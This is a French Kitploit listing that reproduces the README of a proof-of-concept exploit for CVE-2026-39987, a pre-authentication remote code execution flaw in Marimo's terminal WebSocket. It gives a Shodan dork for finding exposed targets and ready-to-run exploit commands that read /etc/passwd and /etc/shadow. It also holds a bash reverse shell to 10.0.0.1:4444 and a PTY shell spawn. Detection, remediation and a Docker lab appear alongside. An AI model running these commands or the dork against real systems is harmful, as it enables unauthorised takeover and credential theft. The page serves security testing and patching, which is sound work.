Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
marimo_CVE-2026-39987_RCE_PoC — PoC de CVE-2026-39987 : RCE pré-authentification via WebSocket dans Marimo antérieur à 0.23.0 (CVSS 9.3). | Kitploit
Outils/GitHubGitHub/fevar54/marimo_cve-2026-39987_rce_poc
ReconnaissanceAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et Éducation
GitHubfevar54/marimo_cve-2026-39987_rce_poc

marimo_CVE-2026-39987_RCE_PoC

PoC de CVE-2026-39987 : RCE pré-authentification via WebSocket dans Marimo antérieur à 0.23.0 (CVSS 9.3).

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Voir le dépôt
1il y a 4 moisPas encore vérifié
Partager

CVE-2026-39987 - Marimo < 0.23.0 Pre-Auth RCE (WebSocket)

⚠️ AVERTISSEMENT LÉGAL ⚠️

Ce script est UNIQUEMENT à des fins éducatives et pour des tests autorisés. L'utilisation non autorisée de cet outil contre des systèmes sans permission explicite est ILLÉGALE. L'auteur décline toute responsabilité en cas de mauvaise utilisation de ces informations.

📋 Description

Les versions de Marimo antérieures à la 0.23.0 présentent une vulnérabilité critique d'exécution de code à distance (RCE) sans authentification préalable. Le endpoint /terminal/ws n'implémente pas de contrôles d'accès adéquats, permettant à un attaquant non authentifié d'obtenir un shell interactif complet sur le système.

DétailInformations
CVECVE-2026-39987
SévéritéCRITIQUE
Score CVSS9.3 (CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H)
TypeExécution de code à distance pré-authentification (RCE)
VecteurWebSocket (/terminal/ws)
Produit affectéMarimo < 0.23.0
CorrectifMarimo ≥ 0.23.0

🎯 Impact

  • ✅ Exécution de commandes à distance SANS authentification
  • ✅ Shell interactif PTY complet
  • ✅ Compromission totale du système
  • ✅ Accès aux données sensibles
  • ✅ Mouvement latéral possible sur le réseau

🔍 Identification

Shodan Dork

http.favicon.hash:-1864630356

text

Empreinte

  • Hash du favicon : -1864630356
  • Endpoint de version : /api/version

💀 PoC d'Exploitation

Prérequis

root@kitploit:~
pip install websockets requests
Utilisation de base
bash
python CVE-2026-39987_PoC.py http://victime.com:8080 "id"
Exemples
bash
# Obtenir les informations du système
python CVE-2026-39987_PoC.py http://target.com:8080 "id"
python CVE-2026-39987_PoC.py http://target.com:8080 "uname -a"
python CVE-2026-39987_PoC.py http://target.com:8080 "whoami"

# Lire des fichiers sensibles
python CVE-2026-39987_PoC.py http://target.com:8080 "cat /etc/passwd"
python CVE-2026-39987_PoC.py http://target.com:8080 "cat /etc/shadow"

# Reverse shell
python CVE-2026-39987_PoC.py http://target.com:8080 "bash -i >& /dev/tcp/10.0.0.1/4444 0>&1"

# Shell interactif
python CVE-2026-39987_PoC.py http://target.com:8080 "python3 -c 'import pty; pty.spawn(\"/bin/bash\")'"
🛡️ Détection (Sûre)
Script de détection passive
bash
python detector.py -u http://target.com:8080
python detector.py -l urls.txt
Modèle Nuclei
yaml
# marimo-cve-2026-39987.yaml
id: CVE-2026-39987

info:
  name: Marimo < 0.23.0 Pre-Auth RCE
  severity: critical
  # ... (modèle complet inclus)
🔧 Remédiation
Immédiate
DÉCONNECTER le système du réseau s'il est exposé

Bloquer l'accès au port où Marimo est exécuté

Examiner les journaux pour détecter toute activité suspecte

Permanente
bash
# Mettre à jour vers la version corrigée
pip install --upgrade marimo>=0.23.0

# Vérifier la version
marimo --version

# Configurer l'authentification si exposé publiquement
# NE JAMAIS exposer 'marimo edit' directement sur Internet

Docker (Environnement vulnérable)
bash
# Exécuter la version vulnérable pour les tests
docker run -p 8080:8080 marimo-team/marimo:0.22.0

# Vérifier la vulnérabilité
python CVE-2026-39987_detector.py http://localhost:8080

# Exploiter
python CVE-2026-39987_PoC.py http://localhost:8080 "id"

GitHub Security Advisory

Entrée NVD

Pull Request #9098

Documentation Marimo

👥 Crédits
Découverte : [Nom du chercheur]

Développement du PoC : [Votre nom]

Correctif : Marimo Team

📜 Licence
Ce projet est uniquement à des fins éducatives. L'utilisation de ce logiciel se fait à vos propres risques.

⭐ Si ce README vous a été utile, pensez à mettre une étoile au dépôt.

⚠️ RAPPELEZ-VOUS : UN GRAND POUVOIR IMPLIQUE DE GRANDES RESPONSABILITÉS
Télécharger l’outil